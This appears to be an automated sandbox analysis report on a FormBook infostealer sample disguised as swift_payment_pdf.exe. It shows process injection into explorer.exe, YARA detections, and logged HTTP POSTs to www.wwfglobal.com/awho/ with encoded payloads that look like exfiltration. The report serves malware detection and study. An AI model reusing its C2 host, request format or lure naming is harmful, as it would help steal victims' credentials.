                Data Raw: 4c 74 51 78 47 46 3d 4b 49 42 73 41 6b 37 33 75 51 45 68 5a 45 79 65 64 38 6a 72 75 56 57 2f 47 4d 56 78 4e 58 64 59 56 75 45 54 6b 54 6e 32 2b 7a 66 69 65 36 6a 47 4b 50 62 73 4c 69 42 4d 30 6f 44 2f 45 44 7a 76 66 41 4e 76 4f 76 69 7a 4e 68 2b 72 48 73 43 35 43 50 52 48 7a 36 48 4c 37 57 30 44 6b 54 6e 56 31 37 4f 71 73 6b 6b 54 77 77 4f 6d 73 68 50 50 33 43 74 30 64 62 61 63 32 41 50 6e 47 34 73 78 38 2f 52 7a 49 65 2b 46 61 74 56 50 33 74 4e 71 61 47 70 30 32 77 57 32 36 34 37 78 6d 4c 33 2f 56 37 58 39 59 38 71 42 66 75 59 6a 35 41 45 4c 53 46 64 53 6d 63 64 57 58 58 4a 6b 34 57 52 56 64 77 3d 3d
                Data Ascii: LtQxGF=KIBsAk73uQEhZEyed8jruVW/GMVxNXdYVuETkTn2+zfie6jGKPbsLiBM0oD/EDzvfANvOvizNh+rHsC5CPRHz6HL7W0DkTnV17OqskkTwwOmshPP3Ct0dbac2APnG4sx8/RzIe+FatVP3tNqaGp02wW2647xmL3/V7X9Y8qBfuYj5AELSFdSmcdWXXJk4WRVdw==
                Jul 4, 2024 12:37:47.336909056 CEST1236INHTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:47 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=59sfsk5vb61o8dvihsk4a1tq01; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Content-Length: 1115
                Content-Type: text/html; charset=UTF-8
                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 56 61 6f db 36 10 fd 5c ff 8a 0b 83 0d 09 16 4b b2 1b 04 85 2d 19 48 5d a7 c9 90 c4 59 a6 b4 eb a7 81 12 69 89 0d 2d aa 24 65 c7 0b fa df 77 a4 9c d4 c6 92 a1 2b 32 19 30 25 ea f8 ee ee f1 dd 51 f1 ce bb e9 38 fd 74 35 81 d3 f4 e2 1c ae 6e de 9e 9f 8d 81 74 c3 f0 e3 eb 71 18 be 4b df b5 2f 0e 83 a8 07 a9 a6 95 11 56 a8 8a ca 30 9c 5c 92 0e 29 ad ad 07 61 b8 5c 2e 83 e5 eb 40 e9 22 4c af c3 d2 ce e5 61 28 95 32 3c 60 96 91 51 27 76 53 6e e0 94 e1 30 e7 96 82 5b da e5 5f 1a b1 48 c8 58 55 96 57 b6 9b ae 6a 4e 20 6f 9f 12 62 f9 9d f5 68 43 c8 4b aa 0d b7 49 63 67 dd 37 0e f1 62 92 1e c3 e5 f1 c5 24 21 d7 d3 b7 d3 f4 77 02 e3 e9 65 3a b9 4c 13 72 39 bd 9c 3c da 9c a6 e9 55 77 f2 db cd d9 87 84 5c 5d 1f bf bf 38 de b2 ec 8e 8f c7 a7 4f 5b fb 37 5d 67 7b 3d 3d ff de 45 93 3f ae ce ae 27 9b d1 5c a8 ea 00 fa 7d f8 b5 91 d0 8f a2 3e f4 7a 83 5e 7f 80 84 be bf 48 11 a3 13 5b 61 25 1f 9d 4c 6f ae 61 7a 0a 6e dc 81 bd c3 e8 70 3f 0e db 57 9d d8 d8 95 e4 60 91 9f 35 2d b9 31 b8 [TRUNCATED]
                Data Ascii: Vao6\K-H]Yi-$ew+20%Q8t5ntqK/V0\)a\.@"La(2<`Q'vSn0[_HXUWjN obhCKIcg7b$!we:Lr9<Uw\]8O[7]g{==E?'\}>z^H[a%Loaznp?W`5-16Slu`@/~BTPSDU8@{skQMH`n~jk
                Jul 4, 2024 12:37:47.336925030 CEST701INData Raw: 26 f0 d0 41 eb 1a 12 f4 f7 b4 c1 3a a0 d6 c2 87 e4 9d b8 58 9e c9 72 97 36 56 b9 78 b9 06 7a 00 5b 8f 83 85 40 4d 72 06 f7 a8 1b a9 f4 00 76 4f 4e 4e 86 f0 75 7b d5 a0 54 0b 1c bf 19 8d c7 63 67 f4 48 48 27 66 62 01 82 25 e4 db 32 02 fe 65 42 b6
                Data Ascii: &A:Xr6Vxz[@MrvONNu{TcgHH'fb%2eB-(JOGo!d4-j*sZ4Z9uZh!%X>r5[?fE.+;TWS;vJQh$YV,w8fRQ^dq{.P}Qdax='#


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.46064152.1.217.30802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:49.265901089 CEST782OUTPOST /awho/ HTTP/1.1
                Host: www.wwfglobal.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.wwfglobal.com
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.wwfglobal.com/awho/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 4b 49 42 73 41 6b 37 33 75 51 45 68 4c 30 75 65 62 62 2f 72 70 31 57 38 44 4d 56 78 45 33 64 45 56 75 34 54 6b 53 69 74 2f 46 50 69 65 62 54 47 4c 4c 50 73 47 43 42 4d 74 59 44 6a 4a 6a 7a 6b 66 41 49 53 4f 75 65 7a 4e 68 71 72 48 70 2b 35 43 34 46 59 79 71 48 4a 75 6d 30 42 72 7a 6e 56 31 37 4f 71 73 6b 41 35 77 77 47 6d 73 52 66 50 33 67 56 37 43 72 61 64 2f 67 50 6e 51 49 74 34 38 2f 52 72 49 66 54 65 61 76 64 50 33 73 39 71 61 33 70 33 34 41 58 39 6e 6f 37 76 75 6f 6d 30 56 71 2b 78 58 4f 75 66 58 73 73 56 34 47 56 52 44 30 38 46 30 63 35 6c 4b 51 41 51 31 56 73 63 47 2f 70 53 55 6d 68 6c 63 6f 76 53 6d 58 6b 50 2b 42 6c 36 66 65 59 3d
                Data Ascii: LtQxGF=KIBsAk73uQEhL0uebb/rp1W8DMVxE3dEVu4TkSit/FPiebTGLLPsGCBMtYDjJjzkfAISOuezNhqrHp+5C4FYyqHJum0BrznV17OqskA5wwGmsRfP3gV7Crad/gPnQIt48/RrIfTeavdP3s9qa3p34AX9no7vuom0Vq+xXOufXssV4GVRD08F0c5lKQAQ1VscG/pSUmhlcovSmXkP+Bl6feY=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.46064252.1.217.30802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:51.838017941 CEST10864OUTPOST /awho/ HTTP/1.1
                Host: www.wwfglobal.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.wwfglobal.com
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.wwfglobal.com/awho/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 4b 49 42 73 41 6b 37 33 75 51 45 68 4c 30 75 65 62 62 2f 72 70 31 57 38 44 4d 56 78 45 33 64 45 56 75 34 54 6b 53 69 74 2f 46 48 69 65 74 6e 47 4b 71 50 73 48 43 42 4d 79 6f 44 67 4a 6a 7a 35 66 42 74 5a 4f 75 53 6a 4e 69 53 72 46 4c 6d 35 56 36 39 59 6e 36 48 4a 73 6d 30 41 6b 54 6e 41 31 37 65 6d 73 6b 51 35 77 77 47 6d 73 54 58 50 2b 53 74 37 41 72 61 63 32 41 50 37 47 34 74 55 38 2f 4a 37 49 66 58 4f 61 65 39 50 33 4d 74 71 4b 56 42 33 36 67 58 2f 6d 6f 36 38 75 6f 71 37 56 71 69 58 58 50 4b 35 58 76 77 56 38 54 73 2b 58 31 73 2b 32 38 64 2f 55 33 59 4e 32 53 63 67 65 64 34 72 48 6d 68 4d 65 35 50 67 68 41 5a 36 73 42 30 37 4e 65 67 45 72 2b 71 47 6b 49 50 70 63 53 4d 57 76 46 6c 4c 6d 52 42 34 77 55 7a 41 34 2b 4e 6d 56 4f 54 68 77 37 4a 68 73 2f 2b 54 56 4a 76 59 36 4e 74 39 52 51 35 35 62 4c 77 45 43 53 46 48 57 5a 55 74 4b 4a 33 4f 51 6c 69 38 76 54 79 42 50 58 57 51 7a 30 79 44 38 6d 4e 32 31 63 37 5a 6c 44 44 33 67 68 72 35 4d 69 2b 7a 41 6b 37 53 66 73 6f 73 7a 69 52 [TRUNCATED]
                Data Ascii: LtQxGF=KIBsAk73uQEhL0uebb/rp1W8DMVxE3dEVu4TkSit/FHietnGKqPsHCBMyoDgJjz5fBtZOuSjNiSrFLm5V69Yn6HJsm0AkTnA17emskQ5wwGmsTXP+St7Arac2AP7G4tU8/J7IfXOae9P3MtqKVB36gX/mo68uoq7VqiXXPK5XvwV8Ts+X1s+28d/U3YN2Scged4rHmhMe5PghAZ6sB07NegEr+qGkIPpcSMWvFlLmRB4wUzA4+NmVOThw7Jhs/+TVJvY6Nt9RQ55bLwECSFHWZUtKJ3OQli8vTyBPXWQz0yD8mN21c7ZlDD3ghr5Mi+zAk7SfsosziRqgAIZKsbgCmb69Dj/etX+okpgOiuaqh4wCB9lTN9YF/SIIaVoiZNKOcc+CkOu/Z9Wk7wNBU7sPMRSZ2sD/22CPqneLvytbyW+oCOV4ClbV50JCv4/ZKzGjLJT/DHcbaEuKn74vsAa9ErVVBxmhAuiWZrmoEOPNLK9yEwtkh3aU2IXWl9msP3QYSqMsW7MtaCuQHosnkVzGolfasfT3OIreWDI3W1t04wkcPUFhZ2gblBUuydKArlDmLkIbva2+QeUreCjQ6LY36f/MNUChfJCw+fvD+UuJ9X6HRM8GQOZ02mgieXQCtdPhjZ9hTs5pXngWxBDpx7yyLXZkdrP93AQrEFXucq1YgCjRD/GaYGxXWywfIwW24pbhRblPa8S9o9H9aEiLUr49/pNrrqggwWZYfbcrVH5soJG7quNFGkf7QtWcf61C0s4OeUYeHwZLNfVlfsQMGtu2RDrUGOtK8Nh2nVpEAJAmYXSFXyzzT7rPgMdX+OQySBG22jv6W2BRuD3L1WsucAyOm31Hs7DSYvzOqVzk0wOWJtne9PzuDUs3xsDPAixBjGR5n98WS4oJLUElJQdg3PO8neO/1uUdRkGdg0zhBAQyVihUeOveCBkOx+YQkZe+epDhatsP+73IxIRR83dFLlsfGAG7pg3vo54h7/o87J63kW2N [TRUNCATED]
                Jul 4, 2024 12:37:52.321455956 CEST1236INHTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:52 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=rttvo4em4t1k4snuk62mngh6c6; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Content-Length: 1115
                Content-Type: text/html; charset=UTF-8
                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 56 61 6f db 36 10 fd 5c ff 8a 0b 83 0d 09 16 4b b2 1b 04 85 2d 19 48 5d a7 c9 90 c4 59 a6 b4 eb a7 81 12 69 89 0d 2d aa 24 65 c7 0b fa df 77 a4 9c d4 c6 92 a1 2b 32 19 30 25 ea f8 ee ee f1 dd 51 f1 ce bb e9 38 fd 74 35 81 d3 f4 e2 1c ae 6e de 9e 9f 8d 81 74 c3 f0 e3 eb 71 18 be 4b df b5 2f 0e 83 a8 07 a9 a6 95 11 56 a8 8a ca 30 9c 5c 92 0e 29 ad ad 07 61 b8 5c 2e 83 e5 eb 40 e9 22 4c af c3 d2 ce e5 61 28 95 32 3c 60 96 91 51 27 76 53 6e e0 94 e1 30 e7 96 82 5b da e5 5f 1a b1 48 c8 58 55 96 57 b6 9b ae 6a 4e 20 6f 9f 12 62 f9 9d f5 68 43 c8 4b aa 0d b7 49 63 67 dd 37 0e f1 62 92 1e c3 e5 f1 c5 24 21 d7 d3 b7 d3 f4 77 02 e3 e9 65 3a b9 4c 13 72 39 bd 9c 3c da 9c a6 e9 55 77 f2 db cd d9 87 84 5c 5d 1f bf bf 38 de b2 ec 8e 8f c7 a7 4f 5b fb 37 5d 67 7b 3d 3d ff de 45 93 3f ae ce ae 27 9b d1 5c a8 ea 00 fa 7d f8 b5 91 d0 8f a2 3e f4 7a 83 5e 7f 80 84 be bf 48 11 a3 13 5b 61 25 1f 9d 4c 6f ae 61 7a 0a 6e dc 81 bd c3 e8 70 3f 0e db 57 9d d8 d8 95 e4 60 91 9f 35 2d b9 31 b8 [TRUNCATED]
                Data Ascii: Vao6\K-H]Yi-$ew+20%Q8t5ntqK/V0\)a\.@"La(2<`Q'vSn0[_HXUWjN obhCKIcg7b$!we:Lr9<Uw\]8O[7]g{==E?'\}>z^H[a%Loaznp?W`5-16Slu`@/~BTPSDU8@{skQMH`n~jk
                Jul 4, 2024 12:37:52.322978020 CEST701INData Raw: 26 f0 d0 41 eb 1a 12 f4 f7 b4 c1 3a a0 d6 c2 87 e4 9d b8 58 9e c9 72 97 36 56 b9 78 b9 06 7a 00 5b 8f 83 85 40 4d 72 06 f7 a8 1b a9 f4 00 76 4f 4e 4e 86 f0 75 7b d5 a0 54 0b 1c bf 19 8d c7 63 67 f4 48 48 27 66 62 01 82 25 e4 db 32 02 fe 65 42 b6
                Data Ascii: &A:Xr6Vxz[@MrvONNu{TcgHH'fb%2eB-(JOGo!d4-j*sZ4Z9uZh!%X>r5[?fE.+;TWS;vJQh$YV,w8fRQ^dq{.P}Qdax='#


                Session IDSource IPSource PortDestination IPDestination Port
                24192.168.2.46064352.1.217.3080
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:54.731409073 CEST490OUTGET /awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaL HTTP/1.1
                Host: www.wwfglobal.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Jul 4, 2024 12:37:55.226159096 CEST1236INHTTP/1.1 404 Not Found
                Date: Thu, 04 Jul 2024 10:37:55 GMT
                Server: Apache
                Access-Control-Allow-Headers: content-type,cache-control,x-requested-with,x-request-auth,x-request-preflight-ews,authorization,x-request-id,ews-deviceid,ews-token,ews-apikey,ews-devicename
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                Pragma: no-cache
                Set-Cookie: flexmarkx_x5_sess_id=ocojme6j9q0ajf5vusma8tpnm2; path=/; HttpOnly
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'self' *.enagic.mobi *.enagic.com *.enagic.ca *.enagiceu.com *.enagicwebsystem.com 10.0.2.20:3003 localhost
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 61 30 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 4e 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 41 43 48 45 2d 43 4f 4e 54 52 4f 4c 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 [TRUNCATED]
                Data Ascii: a0e<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META NAME="ROBOTS" CONTENT="NONE"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"><META HTTP-EQUIV="EXPIRES" CONTENT="Mon, 22 Jul 2002 11:12:01 GMT"><title>FOUR OH FOUR! (404)</title><st
                Jul 4, 2024 12:37:55.226176977 CEST224INData Raw: 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 2c 68 74 6d 6c 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65
                Data Ascii: yle type="text/css">body,html {width: 100%; margin: 0; padding: 0;}</style></head><body><script type="text/javascript">if (document.body){document.body.style.margin = 0;document.body.style.padding = 0;}</script
                Jul 4, 2024 12:37:55.226188898 CEST1236INData Raw: 3e 0a 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 23 61 75 74 6f 68 65 61 64 65 72 20 61 2c 20 23 61 75 74 6f 68 65 61 64 65 72 20 61 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 20 7d 0a 23
                Data Ascii: ><style type="text/css">#autoheader a, #autoheader a:visited { color: #FFF; }#autoheader a:hover { color: #CCC; }</style><div id="autoheader" style="width: 100%; height: 168px; background-image: url(https://app.enagicwebsystem.com/image
                Jul 4, 2024 12:37:55.226201057 CEST694INData Raw: 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 70 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 22 20 73 69 7a 65 3d 22
                Data Ascii: ong></font></p> <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">You may have typed the web address incorrectly. Please check the address and spelling ensuring that it does not contain capital letters or


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:06:34:46
                Start date:04/07/2024
                Path:C:\Users\user\Desktop\swift_payment_pdf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\swift_payment_pdf.exe"
                Imagebase:0xae0000
                File size:730'624 bytes
                MD5 hash:8E32F87B4F51FAC392122D3C43B2E54F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:5
                Start time:06:35:07
                Start date:04/07/2024
                Path:C:\Users\user\Desktop\swift_payment_pdf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\swift_payment_pdf.exe"
                Imagebase:0x8c0000
                File size:730'624 bytes
                MD5 hash:8E32F87B4F51FAC392122D3C43B2E54F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:true

                General

                Target ID:6
                Start time:06:35:34
                Start date:04/07/2024
                Path:C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe"
                Imagebase:0x1c0000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                General

                Target ID:7
                Start time:06:35:36
                Start date:04/07/2024
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\explorer.exe"
                Imagebase:0x7a0000
                File size:4'514'184 bytes
                MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:false

                General

                Target ID:8
                Start time:06:35:48
                Start date:04/07/2024
                Path:C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe"
                Imagebase:0x1c0000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                General

                Target ID:9
                Start time:06:36:00
                Start date:04/07/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff6bf500000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:8.7%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:161
                  Total number of Limit Nodes:7
                  execution_graph 25054 4ed9def 25059 4eda60e 25054->25059 25077 4eda5b0 25054->25077 25094 4eda5a0 25054->25094 25055 4ed9dfe 25060 4eda611 25059->25060 25061 4eda59c 25059->25061 25111 4edb34d 25061->25111 25116 4edac32 25061->25116 25121 4edafbd 25061->25121 25129 4edaa02 25061->25129 25134 4edab20 25061->25134 25139 4edacc1 25061->25139 25144 4edabea 25061->25144 25149 4edabc9 25061->25149 25154 4edaf49 25061->25154 25158 4edab4e 25061->25158 25166 4edb44f 25061->25166 25174 4edab6f 25061->25174 25182 4edaa2c 25061->25182 25187 4edac4d 25061->25187 25062 4eda5ee 25062->25055 25078 4eda5ca 25077->25078 25080 4edb34d 2 API calls 25078->25080 25081 4edac4d 2 API calls 25078->25081 25082 4edaa2c 2 API calls 25078->25082 25083 4edab6f 4 API calls 25078->25083 25084 4edb44f 2 API calls 25078->25084 25085 4edab4e 4 API calls 25078->25085 25086 4edaf49 2 API calls 25078->25086 25087 4edabc9 2 API calls 25078->25087 25088 4edabea 2 API calls 25078->25088 25089 4edacc1 2 API calls 25078->25089 25090 4edab20 2 API calls 25078->25090 25091 4edaa02 2 API calls 25078->25091 25092 4edafbd 4 API calls 25078->25092 25093 4edac32 2 API calls 25078->25093 25079 4eda5ee 25079->25055 25080->25079 25081->25079 25082->25079 25083->25079 25084->25079 25085->25079 25086->25079 25087->25079 25088->25079 25089->25079 25090->25079 25091->25079 25092->25079 25093->25079 25095 4eda5b0 25094->25095 25097 4edb34d 2 API calls 25095->25097 25098 4edac4d 2 API calls 25095->25098 25099 4edaa2c 2 API calls 25095->25099 25100 4edab6f 4 API calls 25095->25100 25101 4edb44f 2 API calls 25095->25101 25102 4edab4e 4 API calls 25095->25102 25103 4edaf49 2 API calls 25095->25103 25104 4edabc9 2 API calls 25095->25104 25105 4edabea 2 API calls 25095->25105 25106 4edacc1 2 API calls 25095->25106 25107 4edab20 2 API calls 25095->25107 25108 4edaa02 2 API calls 25095->25108 25109 4edafbd 4 API calls 25095->25109 25110 4edac32 2 API calls 25095->25110 25096 4eda5ee 25096->25055 25097->25096 25098->25096 25099->25096 25100->25096 25101->25096 25102->25096 25103->25096 25104->25096 25105->25096 25106->25096 25107->25096 25108->25096 25109->25096 25110->25096 25113 4edaf26 25111->25113 25112 4edb4a7 25113->25111 25113->25112 25192 4ed9668 25113->25192 25196 4ed9670 25113->25196 25117 4edb083 25116->25117 25200 4ed9580 25117->25200 25204 4ed957a 25117->25204 25118 4edb298 25118->25118 25122 